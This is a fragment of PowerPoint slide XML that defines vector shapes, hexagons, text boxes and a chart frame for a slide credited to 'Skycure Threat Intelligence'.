                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="619" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="619" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="635" y="226"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="656" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="656" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="735" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="735" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="719" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="719" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="703" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="687" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="687" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="671" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="629" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="603" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="603" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="535" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="120" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="21"/>
                      </a:ln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4" name="Freeform 69"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7412038" y="4513263"/>
                  <a:ext cx="273050" cy="225425"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 630 w 757"/>
                    <a:gd name="T1" fmla="*/ 557 h 626"/>
                    <a:gd name="T2" fmla="*/ 630 w 757"/>
                    <a:gd name="T3" fmla="*/ 557 h 626"/>
                    <a:gd name="T4" fmla="*/ 635 w 757"/>
                    <a:gd name="T5" fmla="*/ 520 h 626"/>
                    <a:gd name="T6" fmla="*/ 635 w 757"/>
                    <a:gd name="T7" fmla="*/ 510 h 626"/>
                    <a:gd name="T8" fmla="*/ 625 w 757"/>
                    <a:gd name="T9" fmla="*/ 494 h 626"/>
                    <a:gd name="T10" fmla="*/ 625 w 757"/>
                    <a:gd name="T11" fmla="*/ 494 h 626"/>
                    <a:gd name="T12" fmla="*/ 609 w 757"/>
                    <a:gd name="T13" fmla="*/ 473 h 626"/>
                    <a:gd name="T14" fmla="*/ 582 w 757"/>
                    <a:gd name="T15" fmla="*/ 457 h 626"/>
                    <a:gd name="T16" fmla="*/ 0 w 757"/>
                    <a:gd name="T17" fmla="*/ 426 h 626"/>
                    <a:gd name="T18" fmla="*/ 47 w 757"/>
                    <a:gd name="T19" fmla="*/ 284 h 626"/>
                    <a:gd name="T20" fmla="*/ 441 w 757"/>
                    <a:gd name="T21" fmla="*/ 331 h 626"/>
                    <a:gd name="T22" fmla="*/ 441 w 757"/>
                    <a:gd name="T23" fmla="*/ 326 h 626"/>
                    <a:gd name="T24" fmla="*/ 99 w 757"/>
                    <a:gd name="T25" fmla="*/ 137 h 626"/>
                    <a:gd name="T26" fmla="*/ 147 w 757"/>
                    <a:gd name="T27" fmla="*/ 0 h 626"/>
                    <a:gd name="T28" fmla="*/ 598 w 757"/>
                    <a:gd name="T29" fmla="*/ 294 h 626"/>
                    <a:gd name="T30" fmla="*/ 598 w 757"/>
                    <a:gd name="T31" fmla="*/ 294 h 626"/>
                    <a:gd name="T32" fmla="*/ 651 w 757"/>
                    <a:gd name="T33" fmla="*/ 331 h 626"/>
                    <a:gd name="T34" fmla="*/ 693 w 757"/>
                    <a:gd name="T35" fmla="*/ 368 h 626"/>
                    <a:gd name="T36" fmla="*/ 693 w 757"/>
                    <a:gd name="T37" fmla="*/ 368 h 626"/>
                    <a:gd name="T38" fmla="*/ 724 w 757"/>
                    <a:gd name="T39" fmla="*/ 394 h 626"/>
                    <a:gd name="T40" fmla="*/ 740 w 757"/>
                    <a:gd name="T41" fmla="*/ 426 h 626"/>
                    <a:gd name="T42" fmla="*/ 740 w 757"/>
                    <a:gd name="T43" fmla="*/ 426 h 626"/>
                    <a:gd name="T44" fmla="*/ 750 w 757"/>
                    <a:gd name="T45" fmla="*/ 457 h 626"/>
                    <a:gd name="T46" fmla="*/ 756 w 757"/>
                    <a:gd name="T47" fmla="*/ 489 h 626"/>
                    <a:gd name="T48" fmla="*/ 756 w 757"/>
                    <a:gd name="T49" fmla="*/ 489 h 626"/>
                    <a:gd name="T50" fmla="*/ 745 w 757"/>
                    <a:gd name="T51" fmla="*/ 526 h 626"/>
                    <a:gd name="T52" fmla="*/ 735 w 757"/>
                    <a:gd name="T53" fmla="*/ 567 h 626"/>
                    <a:gd name="T54" fmla="*/ 714 w 757"/>
                    <a:gd name="T55" fmla="*/ 625 h 626"/>
                    <a:gd name="T56" fmla="*/ 614 w 757"/>
                    <a:gd name="T57" fmla="*/ 588 h 626"/>
                    <a:gd name="T58" fmla="*/ 614 w 757"/>
                    <a:gd name="T59" fmla="*/ 588 h 626"/>
                    <a:gd name="T60" fmla="*/ 630 w 757"/>
                    <a:gd name="T61" fmla="*/ 557 h 6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757" h="626">
                      <a:moveTo>
                        <a:pt x="630" y="557"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="630" y="557"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="635" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="635" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="609" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="582" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="426"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="284"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="693" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="693" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="724" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="740" y="426"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="740" y="426"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="756" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="756" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="745" y="526"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="735" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="714" y="625"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="614" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="614" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="630" y="557"/>
                      </a:ln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190" name="Rectangle 189"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6202518"/>
            <a:ext cx="3146425" cy="65548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2" name="TextBox 201"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2177277" y="4340381"/>
            <a:ext cx="129540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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Rectangle 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="14176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57" name="Chart 56"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2520258" y="1554866"/>
          <a:ext cx="6201062" cy="34237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8" name="Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5494147" y="5046699"/>
            <a:ext cx="3377848" cy="3077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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Based on Skycure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Threat Intelligence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1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pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Picture 4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8849" y="6407797"/>
            <a:ext cx="1499644" cy="383267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777467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Hexagon 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4388156" y="3554672"/>
            <a:ext cx="1499489" cy="1295400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1502664"/>
              <a:gd name="connsiteY0" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX1" fmla="*/ 323850 w 1502664"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX2" fmla="*/ 1178814 w 1502664"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX3" fmla="*/ 1502664 w 1502664"/>
              <a:gd name="connsiteY3" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX4" fmla="*/ 1178814 w 1502664"/>
              <a:gd name="connsiteY4" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX5" fmla="*/ 323850 w 1502664"/>
              <a:gd name="connsiteY5" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1502664"/>
              <a:gd name="connsiteY6" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1499489"/>
              <a:gd name="connsiteY0" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX1" fmla="*/ 320675 w 1499489"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX2" fmla="*/ 1175639 w 1499489"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX3" fmla="*/ 1499489 w 1499489"/>
              <a:gd name="connsiteY3" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX4" fmla="*/ 1175639 w 1499489"/>
              <a:gd name="connsiteY4" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX5" fmla="*/ 320675 w 1499489"/>
              <a:gd name="connsiteY5" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1499489"/>
              <a:gd name="connsiteY6" fmla="*/ 64770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99489" h="1295400">
                <a:moveTo>
                  <a:pt x="0" y="647700"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="320675" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175639" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499489" y="647700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175639" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320675" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6477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vert270" lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Hexagon 196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3002269" y="3553083"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha val="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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular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-2684681" y="1430013"/>
            <a:ext cx="5295775" cy="2629525"/>
            <a:chOff x="-2684681" y="1430013"/>
            <a:chExt cx="5295775" cy="2629525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101" name="Freeform 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-2359787" y="1430013"/>
              <a:ext cx="2200406" cy="2629525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3134 w 6195"/>
                <a:gd name="T1" fmla="*/ 3213 h 7403"/>
                <a:gd name="T2" fmla="*/ 3097 w 6195"/>
                <a:gd name="T3" fmla="*/ 3228 h 7403"/>
                <a:gd name="T4" fmla="*/ 3087 w 6195"/>
                <a:gd name="T5" fmla="*/ 3559 h 7403"/>
                <a:gd name="T6" fmla="*/ 3097 w 6195"/>
                <a:gd name="T7" fmla="*/ 3596 h 7403"/>
                <a:gd name="T8" fmla="*/ 3134 w 6195"/>
                <a:gd name="T9" fmla="*/ 3611 h 7403"/>
                <a:gd name="T10" fmla="*/ 3454 w 6195"/>
                <a:gd name="T11" fmla="*/ 3606 h 7403"/>
                <a:gd name="T12" fmla="*/ 3480 w 6195"/>
                <a:gd name="T13" fmla="*/ 3580 h 7403"/>
                <a:gd name="T14" fmla="*/ 3485 w 6195"/>
                <a:gd name="T15" fmla="*/ 3265 h 7403"/>
                <a:gd name="T16" fmla="*/ 3470 w 6195"/>
                <a:gd name="T17" fmla="*/ 3228 h 7403"/>
                <a:gd name="T18" fmla="*/ 4000 w 6195"/>
                <a:gd name="T19" fmla="*/ 0 h 7403"/>
                <a:gd name="T20" fmla="*/ 10 w 6195"/>
                <a:gd name="T21" fmla="*/ 278 h 7403"/>
                <a:gd name="T22" fmla="*/ 125 w 6195"/>
                <a:gd name="T23" fmla="*/ 1086 h 7403"/>
                <a:gd name="T24" fmla="*/ 330 w 6195"/>
                <a:gd name="T25" fmla="*/ 1858 h 7403"/>
                <a:gd name="T26" fmla="*/ 635 w 6195"/>
                <a:gd name="T27" fmla="*/ 2593 h 7403"/>
                <a:gd name="T28" fmla="*/ 1018 w 6195"/>
                <a:gd name="T29" fmla="*/ 3275 h 7403"/>
                <a:gd name="T30" fmla="*/ 1480 w 6195"/>
                <a:gd name="T31" fmla="*/ 3900 h 7403"/>
                <a:gd name="T32" fmla="*/ 2015 w 6195"/>
                <a:gd name="T33" fmla="*/ 4467 h 7403"/>
                <a:gd name="T34" fmla="*/ 2614 w 6195"/>
                <a:gd name="T35" fmla="*/ 4966 h 7403"/>
                <a:gd name="T36" fmla="*/ 3271 w 6195"/>
                <a:gd name="T37" fmla="*/ 5391 h 7403"/>
                <a:gd name="T38" fmla="*/ 3979 w 6195"/>
                <a:gd name="T39" fmla="*/ 5732 h 7403"/>
                <a:gd name="T40" fmla="*/ 4735 w 6195"/>
                <a:gd name="T41" fmla="*/ 5985 h 7403"/>
                <a:gd name="T42" fmla="*/ 6194 w 6195"/>
                <a:gd name="T43" fmla="*/ 7402 h 7403"/>
                <a:gd name="T44" fmla="*/ 6084 w 6195"/>
                <a:gd name="T45" fmla="*/ 2178 h 7403"/>
                <a:gd name="T46" fmla="*/ 5769 w 6195"/>
                <a:gd name="T47" fmla="*/ 2121 h 7403"/>
                <a:gd name="T48" fmla="*/ 5470 w 6195"/>
                <a:gd name="T49" fmla="*/ 2015 h 7403"/>
                <a:gd name="T50" fmla="*/ 5186 w 6195"/>
                <a:gd name="T51" fmla="*/ 1874 h 7403"/>
                <a:gd name="T52" fmla="*/ 4929 w 6195"/>
                <a:gd name="T53" fmla="*/ 1701 h 7403"/>
                <a:gd name="T54" fmla="*/ 4698 w 6195"/>
                <a:gd name="T55" fmla="*/ 1496 h 7403"/>
                <a:gd name="T56" fmla="*/ 4493 w 6195"/>
                <a:gd name="T57" fmla="*/ 1265 h 7403"/>
                <a:gd name="T58" fmla="*/ 4320 w 6195"/>
                <a:gd name="T59" fmla="*/ 1008 h 7403"/>
                <a:gd name="T60" fmla="*/ 4179 w 6195"/>
                <a:gd name="T61" fmla="*/ 724 h 7403"/>
                <a:gd name="T62" fmla="*/ 4073 w 6195"/>
                <a:gd name="T63" fmla="*/ 425 h 7403"/>
                <a:gd name="T64" fmla="*/ 4016 w 6195"/>
                <a:gd name="T65" fmla="*/ 110 h 7403"/>
                <a:gd name="T66" fmla="*/ 4657 w 6195"/>
                <a:gd name="T67" fmla="*/ 3916 h 7403"/>
                <a:gd name="T68" fmla="*/ 4583 w 6195"/>
                <a:gd name="T69" fmla="*/ 3984 h 7403"/>
                <a:gd name="T70" fmla="*/ 4483 w 6195"/>
                <a:gd name="T71" fmla="*/ 4011 h 7403"/>
                <a:gd name="T72" fmla="*/ 2058 w 6195"/>
                <a:gd name="T73" fmla="*/ 4011 h 7403"/>
                <a:gd name="T74" fmla="*/ 1984 w 6195"/>
                <a:gd name="T75" fmla="*/ 3984 h 7403"/>
                <a:gd name="T76" fmla="*/ 1942 w 6195"/>
                <a:gd name="T77" fmla="*/ 3953 h 7403"/>
                <a:gd name="T78" fmla="*/ 1916 w 6195"/>
                <a:gd name="T79" fmla="*/ 3916 h 7403"/>
                <a:gd name="T80" fmla="*/ 1884 w 6195"/>
                <a:gd name="T81" fmla="*/ 3816 h 7403"/>
                <a:gd name="T82" fmla="*/ 1900 w 6195"/>
                <a:gd name="T83" fmla="*/ 3743 h 7403"/>
                <a:gd name="T84" fmla="*/ 3107 w 6195"/>
                <a:gd name="T85" fmla="*/ 1517 h 7403"/>
                <a:gd name="T86" fmla="*/ 3160 w 6195"/>
                <a:gd name="T87" fmla="*/ 1454 h 7403"/>
                <a:gd name="T88" fmla="*/ 3207 w 6195"/>
                <a:gd name="T89" fmla="*/ 1427 h 7403"/>
                <a:gd name="T90" fmla="*/ 3286 w 6195"/>
                <a:gd name="T91" fmla="*/ 1412 h 7403"/>
                <a:gd name="T92" fmla="*/ 3338 w 6195"/>
                <a:gd name="T93" fmla="*/ 1417 h 7403"/>
                <a:gd name="T94" fmla="*/ 3386 w 6195"/>
                <a:gd name="T95" fmla="*/ 1438 h 7403"/>
                <a:gd name="T96" fmla="*/ 3459 w 6195"/>
                <a:gd name="T97" fmla="*/ 1517 h 7403"/>
                <a:gd name="T98" fmla="*/ 4672 w 6195"/>
                <a:gd name="T99" fmla="*/ 3743 h 7403"/>
                <a:gd name="T100" fmla="*/ 4687 w 6195"/>
                <a:gd name="T101" fmla="*/ 3816 h 7403"/>
                <a:gd name="T102" fmla="*/ 4657 w 6195"/>
                <a:gd name="T103" fmla="*/ 3916 h 7403"/>
                <a:gd name="T104" fmla="*/ 5995 w 6195"/>
                <a:gd name="T105" fmla="*/ 7202 h 7403"/>
                <a:gd name="T106" fmla="*/ 3496 w 6195"/>
                <a:gd name="T107" fmla="*/ 2231 h 7403"/>
                <a:gd name="T108" fmla="*/ 3113 w 6195"/>
                <a:gd name="T109" fmla="*/ 2210 h 7403"/>
                <a:gd name="T110" fmla="*/ 3076 w 6195"/>
                <a:gd name="T111" fmla="*/ 2231 h 7403"/>
                <a:gd name="T112" fmla="*/ 3060 w 6195"/>
                <a:gd name="T113" fmla="*/ 2262 h 7403"/>
                <a:gd name="T114" fmla="*/ 3092 w 6195"/>
                <a:gd name="T115" fmla="*/ 2992 h 7403"/>
                <a:gd name="T116" fmla="*/ 3118 w 6195"/>
                <a:gd name="T117" fmla="*/ 3008 h 7403"/>
                <a:gd name="T118" fmla="*/ 3428 w 6195"/>
                <a:gd name="T119" fmla="*/ 3013 h 7403"/>
                <a:gd name="T120" fmla="*/ 3465 w 6195"/>
                <a:gd name="T121" fmla="*/ 3003 h 7403"/>
                <a:gd name="T122" fmla="*/ 3512 w 6195"/>
                <a:gd name="T123" fmla="*/ 2257 h 7403"/>
                <a:gd name="T124" fmla="*/ 3496 w 6195"/>
                <a:gd name="T125" fmla="*/ 2231 h 7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195" h="7403">
                  <a:moveTo>
                    <a:pt x="3433" y="3213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="3606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454" y="3606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3213"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="400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0" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="1086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="1349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="1606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330" y="1858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="2110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="2352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635" y="2593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750" y="2824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882" y="3050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018" y="3275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165" y="3491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="3900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827" y="4289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="4467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205" y="4640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="4808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614" y="4966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3271" y="5391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3501" y="5512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3979" y="5732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226" y="5827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478" y="5911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4735" y="5985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4992" y="6047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4992" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6084" y="2178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5979" y="2162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5874" y="2141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5769" y="2121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5669" y="2089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5565" y="2052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5470" y="2015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5375" y="1974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281" y="1926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5186" y="1874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5098" y="1821"/>
                  </a:lnTo>
                  <a:lnTo>
